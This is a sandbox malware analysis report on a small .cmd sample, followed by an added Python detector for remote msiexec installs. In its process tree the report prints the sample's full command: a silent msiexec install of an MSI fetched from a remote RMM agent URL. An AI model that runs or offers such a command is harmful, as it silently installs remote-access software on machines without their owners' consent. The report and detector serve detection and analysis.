Analysis
max time kernel: 122s
max time network: 126s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 02-12-2024 17:14
Static task: static1
Behavioral task: behavioral1
  Sample: .cmd
  Resource: win7-20241023-en (windows7-x64)
  5 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: .cmd
  Resource: win10v2004-20241007-en (windows10-2004-x64)
  24 signatures, 150 seconds
General
Target: .cmd
Size: 243B
MD5: c4bf62cf6cc80eac0f69164f01d1f5ee
SHA1: 8d2a2748387d76924429b3fd35bca6ae2fca4507
SHA256: eb4e2f8d3d2a735a325c6510ba0f814ca4652dede7b62ee342ec6f0b0c00b04b
SHA512: 92f06f6491347827e90eb36b1c424b20e19de1d460d45ac1313b4bdbdabb0aec9ba8983ff0a4a4efdbc34a9bcb52f58c15923ad7fbeda228aa8cef180512d87d
Score: 7/10
Malware Config
Signatures
Use of msiexec (install) with remote resource (1 IoC)
  PID 2468  msiexec.exe

Blocklisted process makes network request (2 IoCs)
  flow 5  PID 2616  msiexec.exe
  flow 6  PID 2616  msiexec.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 2468  msiexec.exe

Suspicious use of AdjustPrivilegeToken (34 IoCs)
  PID 2616  msiexec.exe: SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
  PID 2468  msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege

Suspicious use of WriteProcessMemory (5 IoCs)
  PID 684 cmd.exe wrote to memory of PID 2468 (procid_target 31), recorded 5 times
Processes
C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\.cmd"
  PID: 684
  - Suspicious use of WriteProcessMemory
  └ C:\Windows\system32\msiexec.exe
    msiexec /i "https://youreal.servicedesk.atera.com/GetAgent/Msi/?customerId=5&[email protected]&customerName=LL2&accountId=001Q3000003TcZeIAK" /qn [email protected] CompanyId=2 AccountId=001Q300000LYyQnIAL
    PID: 2468
    - Use of msiexec (install) with remote resource
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\msiexec.exe
  C:\Windows\system32\msiexec.exe /V
  PID: 2616
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
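Added example, not part of the sandbox report or of any vendor tooling: a small Python detector for the "Use of msiexec (install) with remote resource" signature, run over constructed process-creation events. The PIDs and image paths follow the process tree above; the URL, file names, the UNC case, the extra negative rows and all function names are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Windows-style tokenising: keep double-quoted runs as one token, then drop the quotes.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# msiexec switches whose next argument is the package path or URL.
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}
# Sources fetched off-host: http(s) URLs and UNC paths. The UNC case is an
# assumption beyond the report, which only shows an https URL.
REMOTE_SOURCE_RE = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def tokenize(cmdline: str) -> list:
    toks = _TOKEN_RE.findall(cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t for t in toks]


@dataclass
class Finding:
    pid: int
    source: str          # remote package location handed to msiexec
    quiet: bool          # /qn, /quiet, /passive or similar present
    properties: dict = field(default_factory=dict)  # PROPERTY=value pairs on the command line


def inspect_msiexec(pid: int, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when msiexec is told to install from a remote source, else None."""
    if not image.lower().endswith("msiexec.exe"):
        return None
    toks = tokenize(cmdline)
    lowered = [t.lower() for t in toks]
    source = None
    for i, t in enumerate(lowered):
        if t in INSTALL_SWITCHES and i + 1 < len(toks):
            source = toks[i + 1]
            break
    if source is None or not REMOTE_SOURCE_RE.match(source):
        return None
    quiet = any(t.startswith(("/q", "-q", "/passive", "-passive")) for t in lowered)
    props = {}
    for t in toks:
        # Skip switches and the source itself (its query string also contains '=').
        if t == source or t.startswith(("/", "-")) or "=" not in t:
            continue
        k, v = t.split("=", 1)
        props[k] = v
    return Finding(pid=pid, source=source, quiet=quiet, properties=props)


def scan_events(events) -> list:
    """Run inspect_msiexec over process-creation events given as dicts (pid, image, cmdline)."""
    out = []
    for ev in events:
        f = inspect_msiexec(ev["pid"], ev["image"], ev["cmdline"])
        if f:
            out.append(f)
    return out


# Constructed sample events (not taken from a real log). PIDs and images follow the
# report's process tree; the URL, file names and the last two rows are invented.
SAMPLE_EVENTS = [
    {"pid": 684, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\sample.cmd"'},
    {"pid": 2468, "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": 'msiexec /i "https://rmm.example.invalid/GetAgent/Msi/?customerId=5" /qn CompanyId=2'},
    {"pid": 2616, "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 3000, "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\Admin\Downloads\tool.msi" /qn'},
    {"pid": 3100, "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r"msiexec /package \\fileserver\share\agent.msi /quiet"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"PID {f.pid}: remote MSI install from {f.source} quiet={f.quiet} props={f.properties}")
```

Only the two rows with an http(s) or UNC package source are flagged; the local-file install and the bare `msiexec /V` process are not. Note how the report itself splits the behaviour across two processes: the URL appears only on the client PID 2468, while the "Blocklisted process makes network request" IoCs land on PID 2616 (`msiexec /V`, the command line the Windows Installer service runs under). A command-line rule like this one therefore catches the request, but network telemetry for the download has to be joined on the service process, not the client.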